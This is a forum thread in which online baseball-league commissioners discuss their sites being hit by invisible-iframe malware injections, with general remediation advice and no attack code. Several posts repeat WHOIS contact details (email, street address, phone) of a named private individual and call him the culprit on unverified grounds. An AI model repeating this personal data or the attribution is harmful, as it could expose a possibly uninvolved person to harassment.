Hacker possibly targetting OOTP online leagues

[gollum65]

This is a notice for all commissioners of OOTP online leagues to keep their ears and eyes open and make sure they have strict control over their websites.

Twice in this past week the website of the league that I commish has been attacked by the same hacker. It's quite a simple attack, and one that I've had no trouble undoing, but now I'm hearing that other leagues have suffered similar recent attacks. The "hacker" simply adds invisible links to your web pages that if browsed to, the invisible links embedded in your site direct the browser to a 2nd website that presumably attempt to load some sort of malware or trojan onto unsuspecting computers.

Plain and simple, this is bush league (to use a baseball metaphor). We're all supposedly just trying to enjoy a hobby, right? What purpose does it serve to cause mischief for our websites and GMs, other then to entertain the feeble mind of the attacker, and annoy the hell out of everyone else. Do us all a favor. Go practice your "hacking" somewhere else.

[kq76]

If it's the same thing as what the CBL went through awhile ago, I don't think it's some fellow OOTPer. I think it's something any website with similar security holes might suffer. I never did figure out exactly how they were doing it (we ended up just going to a bare bones site for a little while), but I did find out that it wasn't limited to OOTP online leagues. Mind giving us more info, maybe a link to a thread on your board talking about it, so I can look into it further?

[Curtis]

Quote:

Originally Posted by gollum65

What purpose does it serve to cause mischief for our websites and GMs, other then to entertain the feeble mind of the attacker, and annoy the hell out of everyone else.

I'm not trying to downplay your completely justified anger, but isn't that the motive behind most vandals? As such, it's very easily understandable — which is not to say forgivable.

[gollum65]

Quote:

Originally Posted by kq76

If it's the same thing as what CBL went through awhile ago, I don't think it's some fellow OOTPer. I think it's something any website with similar security holes might suffer. I never did figure out exactly how they were doing it (we ended up just going to a bare bones site for a little while), but I did find out that it wasn't limited to OOTP online leagues. Mind giving us more info, maybe a link to a thread on your board talking about it, so I can look into it further?

The specific URLs mentioned in the CBL thread are different, but the method of the attacks appears to be identical. We haven't really discussed it a lot on my site as it just started happening this week.

Feel free to contact me if you want a couple of sample files I kept that have the edited code. commish(at)ashmaplebaseball.info

And yes Curtis, I realize that's why they do it. Just have to vent my frustration and annoyance somehow.

[kq76]

Quote:

Originally Posted by gollum65

The specific URLs mentioned in the CBL thread are different, but the method of the attacks appears to be identical. We haven't really discussed it a lot on my site as it just started happening this week.

Feel free to contact me if you want a couple of sample files I kept that have the edited code. commish(at)ashmaplebaseball.info

And yes Curtis, I realize that's why they do it. Just have to vent my frustration and annoyance somehow.

Thanks.

May I ask what host you're using? We were using hostmonster.

I see that you're using SMF forums while we were using phpbb2.x forums. I thought that might have been where the hole was, but there have been cases of sites not using the same boards in the past so I doubt it.

It looks like you're just using simple html, not php like we and others were, so that's probably not the problem.

I'm now thinking it might be folder permissions, but I'll have to look into that topic a bit more. I may end up asking you tell me yours. You can easily check it if you have ftp access.

I'll email you for those files, but if anybody else experiences the same problem feel free to email me some sample files at kq76 at hotmail.com. Please point out the offending code for me or at least detail what you see in your browser.

I'm no website security expert, but I like to think I know at least a tiny bit about the topic. Regardless, I'll ask in OT if there's anybody that can help us. When I thought it was just one or two leagues I didn't think it was that big of a deal, but if it's more then I'd like to put this down immediately.

I would have recommended going to a single page site for awhile, but yours looks so simple (no disrespect, I'm just saying it's likely not the problem) that there's no point. If it does happen again, just re-up your files and sooner or later they'll probably just move on to another site. I know, it's not the best of solutions, but unless we find better that's the only I know of.

[rem]

vMLB (in my sig) has been attacked twice this week.

Here's what the commish has to say:

Quote:

I apologize for all the frustrating issues we've been having with the site and forums lately. I have been talking with Fidel almost nonstop these past couples days to try and figure out the problem. We believe the source of the security issues lies within Getch's Utilities so our next step is to contact him. We also found out who's doing this, his name is John Mohov, I have also contacted him so why he's doing it. If that name rings a bell for anyone, let me know.

Please work with me here on this issue, I've worked too hard on this league to let it fall apart because of this so please don't drop out, we're still going and hopefully we will get this fixed in a couple days. If you have any ideas of what I could do to make this situation easier on you guys, let me know.

I believe the commish is molarmite.

[kq76]

Quote:

Originally Posted by remangiii

vMLB (in my sig) has been attacked twice this week.

Here's what the commish has to say:



I believe the commish is molarmite.

Thanks. I'll PM both and ask them to add to this thread.

If the vMLB's problem was the exact same one that we had then I'm 100% positive it's not to do with Getch's utilities. How am I so sure? Because we didn't have Getch's utilities installed at the time. I didn't install it until well after and we haven't had the problem since.

EDIT: I should say, though, that Getch's and whatever the specific cause of ours was could possibly share the same vulnerability. I just don't want everyone going around saying, "oh, it's Getch's" if they don't really know for sure. Could be, but I'd hate for it to get that reputation if it's really not the cause. I'll ask fhomess and Solonor for their input as they seem to know it fairly well.

[Raderick]

Quote:

Originally Posted by remangiii

vMLB (in my sig) has been attacked twice this week.

Here's what the commish has to say:



I believe the commish is molarmite.

The name rings a bell for me.

[f.montoya]

Four sites that I host were hit this past week, including vMLB. We use the CMS Mambo along with phpbb2 or phpbb3, depending on how long the league has been around. Actually, on a few of the upgraded sites, the malicious code actually failed in it's purpose. That is to say, instead of the cross site scripting sending you to a different site to download a file, Mambo and phpbb actually quit and displayed an error. But a few other sites were running older versions of Mambo and phpbb. These sites would actually do what the script wanted and a pdf file would open after a few seconds and a browser redirect.

The location of the pdf file was at fany008.net(this is the domain and I don't want to post the whole url to the pdf file here) which I later tracked to a Mr John Mohov. While I don't think this guy would actually be attacking sites himself, he is listed as the owner of fany008.net and has a responsibility to remove the infected pdf file from his server and take appropriate preventative security action.

I am listing what is already publicly available on Mr. Mohov here:

john mohov
Email: bryanlink AT live.com (I will do him the courtesy of protecting his emal address from bots)
Organization: mohov ltd
Address: 2198 Bernard rd
City: New Vienna
State: oh
ZIP: 45159
Country: US
Phone: +7.4955123458
Fax:



Usually, these attacks are done via an html web form by wrapping malicious code in php tags in the text fields. Quite simple really. And php code can be used to overwrite append and create files, which is what happened in this case. The script was used to create and overwrite the index.html files in about 50+ locations within Mambo an phpbb and it appended the index.php file to include the redirect command. Easy to find but a major pain to clean out.

[molarmite]

Fidel has basically explained everything I know so far. All I know is I can't keep my forum up for more than 10 minutes without this guy taking it down. I've had some other commisioners contact me as well with this same problem, AMBL commish was one of them. Is this something we should contact Markus, Steve, or Andreas about or can we take care of this ourselves?

[kq76]

Quote:

Originally Posted by f.montoya

...

We use the CMS Mambo along with phpbb2 or phpbb3, depending on how long the league has been around. Actually, on a few of the upgraded sites, the malicious code actually failed in it's purpose.

...

Thanks. I just read a few articles on "****** attacks" as that seems to be what this is commonly labeled and it sounds as though there are countless ways that these attacks can be made (different CMS's, different forum software, even stuff like cPanel). When we first got it I of course thought it might be our phpbb forums (I know a bit about SQL injections and the like) as we were using an old phpbb2.x version instead of the latest phpbb3.x, but the forum pages weren't effected at all, only the main part of the site, so I thought it wasn't the forum. Thinking about it some more, however, I suppose it could have been our forum and somehow they used it to attack the rest of our site, but not the forum itself, maybe to throw us off of what the cause could be. Anyway, your experience leads me to believe this very well might be the case.

Anyway, to anybody out there who is running outdated forum or CMS or any other kind of website software, I highly recommend doing what fidel did and upgrade it, even if you don't think that's the cause. It very well could prevent the problem. You should probably also notify your webhost as they should take a look at whether their stuff is up-to-date as well, but at the very least update whatever you can.

[kq76]

Quote:

Originally Posted by molarmite

Fidel has basically explained everything I know so far. All I know is I can't keep my forum up for more than 10 minutes without this guy taking it down. I've had some other commisioners contact me as well with this same problem, AMBL commish was one of them. Is this something we should contact Markus, Steve, or Andreas about or can we take care of this ourselves?

I doubt it's got anything to do with OOTP stuff, but I'll PM them and ask. I think Andreas knows this stuff pretty well.

[Alan T]

This probably doesn't have anything to do with OOTP at all, and you likely should talk to your service providers or if things get really bad the proper authorities for assistance.

Starting at some point last year, people started heavily using invisible iframes to inject trojans into people's computers. The way it worked is they would use some exploit on the web server or an application on that server to break in enough to post an additional ****** on the site's main page that no one would notice because it is invisible (no picture or anything). Everything that ****** did was behind the scenes by instructing the user who browsed that webpage to go to some other compromised site and download an infected trojan.

I know a very common one was to utilize a real player exploit, where the ****** would have the user's browser download a file that would launch realplayer and make use of that exploit. There have been other recent ones that attack flaws in adobe acrobat reader (.pdf files) and other applications.

Users who kept their replayer, adobe, OS, and other applications up to date usually were not infected by this, but most users are poor about keeping security patches for their OS or applications and they got infected from it.

I work for a company that develops anti-virus software, and there was a memo that went around in the spring that said there were over 200,000 infected sites using this type of attack and that number was growing extremely fast. phpbb was originally one of the targeted services that the attackers would use to put the initial ****** on the site. I am sure they have found other similar vulnerabilities in other scripts or programs.

As far as end users go, users that use firefox with noscript for instance is not fully protected, as by default noscript allowed iframes. Those users should go in to the noscript settings and make sure to explicitly say not to allow iframes either (unless they override it). I am less familiar with internet explorer, but I understand there are ways to protect yourself there as well.

As for the server admins, that is tougher, you really need to look through the logs and find what they are actually exploiting to put the ****** up in the first place and shut that application down until you can upgrade to a fixed version.

Anyhows, I highly doubt this has anything to do with OOTP, and these attackers have just started getting to OOTP sites now. They used to hit MMOPG sites very heavily, especially the heavier played ones (I don't play MMOPGs so can't give which games as specifics I fear), but I know there were reports of this attack being used to steal MMOPG characters in Warcraft to which they would then sell, and other various things.

Sorry I don't have more help for you, but hoped by explaining the history of this type of attack, it might be able to provide you direction to fix it.

[Alan T]

Quote:

Originally Posted by kq76

When we first got it I of course thought it might be our phpbb forums (I know a bit about SQL injections and the like) as we were using an old phpbb2.x version instead of the latest phpbb3.x, but the forum pages weren't effected at all, only the main part of the site, so I thought it wasn't the forum. Thinking about it some more, however, I suppose it could have been our forum and somehow they used it to attack the rest of our site, but not the forum itself, maybe to throw us off of what the cause could be.

I am not a software engineer, I am a network security engineer so don't really know the specifics on how these attacks are done code-wise.. but I would say if you have an old version of phpbb that is not patched to fix this exploit, it is very likely they used this to insert the ****** to your mainpage. Even if they did not touch the forums at all, that is their normal behavior. They just want the malicious code in the very top level root directory for the webservices on the main index page so it gets hit the most.

[gollum65]

John Mohov indeed appears to be the culprit in my case. The fany08 domain is apparently registered to him, and that's what's embedded into my files.

To MY knowledge, this started a few weeks ago when the Suicide Squeeze league was attacked using a simiar method, although you'd have to contact Lonnie Moody to find out for sure. He had to move his whole site to a new host.

My webhost is totalchoicehosting dot com and when I contacted them this morning, they advised me it was that my global permissions were set to allow files to be written, and they fixed the permissions for me. Time will tell if they were right. I've also changed all the website passwords as they directed.

Regarding my forum version, I was on SMF 1.16 till this morning. I updated to 1.17 today.

[f.montoya]

Quote:

Originally Posted by gollum65

John Mohov indeed appears to be the culprit in my case. The fany08 domain is apparently registered to him, and that's what's embedded into my files.

To MY knowledge, this started a few weeks ago when the Suicide Squeeze league was attacked using a simiar method, although you'd have to contact Lonnie Moody to find out for sure. He had to move his whole site to a new host.

My webhost is totalchoicehosting dot com and when I contacted them this morning, they advised me it was that my global permissions were set to allow files to be written, and they fixed the permissions for me. Time will tell if they were right. I've also changed all the website passwords as they directed.

Regarding my forum version, I was on SMF 1.16 till this morning. I updated to 1.17 today.

While they gave you sound advice, you should also make sure they are running the latest version of php.

In addition, via the process of elimination, it appears that there was some sql injection and such code included a self timer which made the forums self destruct and recreated the iframes, even after cleaning out infected indexes from the directories. I was doing so nonstop for hours at one point. Now that I've removed the forum database, it appears all is calm.

[Raidergoo]

New Vienna is about 50 minutes from here. I have a consulting visit to make in Harveysburg, just North of New Vienna, this week. I could Make a criminal complaint.

Clinton County Sheriff Home

Nothing quite like having the local sheriff show up and ask a few questions.

If someone would like me to drive to the office and make the complaint, I could.

[Raidergoo]

Quote:

Originally Posted by f.montoya

Four sites that I host were hit this past week, including vMLB. We use the CMS Mambo along with phpbb2 or phpbb3, depending on how long the league has been around. Actually, on a few of the upgraded sites, the malicious code actually failed in it's purpose. That is to say, instead of the cross site scripting sending you to a different site to download a file, Mambo and phpbb actually quit and displayed an error. But a few other sites were running older versions of Mambo and phpbb. These sites would actually do what the script wanted and a pdf file would open after a few seconds and a browser redirect.

The location of the pdf file was at fany008.net(this is the domain and I don't want to post the whole url to the pdf file here) which I later tracked to a Mr John Mohov. While I don't think this guy would actually be attacking sites himself, he is listed as the owner of fany008.net and has a responsibility to remove the infected pdf file from his server and take appropriate preventative security action.

I am listing what is already publicly available on Mr. Mohov here:

john mohov
Email: bryanlink AT live.com (I will do him the courtesy of protecting his emal address from bots)
Organization: mohov ltd
Address: 2198 Bernard rd
City: New Vienna
State: oh
ZIP: 45159
Country: US
Phone: +7.4955123458
Fax:

The street address is to a farm. Here's a picture.

2198 Bernard rd New vienna OH - Google Maps

The country code on the phone number listed is 7, which is Russia, and area code is 495, which is Moscow, Russia.

Mohov is a Russian name.

A person in the state of Ohio would probably use a LLC to protect assets, not a limited partnership.

[gollum65]

Fidel: Can you explain more about the sql injection? How do I find it? If it exists, what do I remove? I have no idea if I have anything like this or not. And I haven't run accross any erroneous .pdf files on my site, so apparently I didn't get that part of the attack.

Raidergoo: While the attack on my site so far has been pretty minor and easy to fix, it certainly wouldn't upset me if a cop knocked on this guy's door. And by what Fidel is describing has happened to his sites, he'd probably drive the cop himself.

[Raidergoo]

Sadly, this does not seem to be a Clinton County script kiddie anymore.

I just contacted sysadmin AT cari.net, who hosts fany008.

One of the points behind using an email address like bryanlink AT live.com is that they are disposable.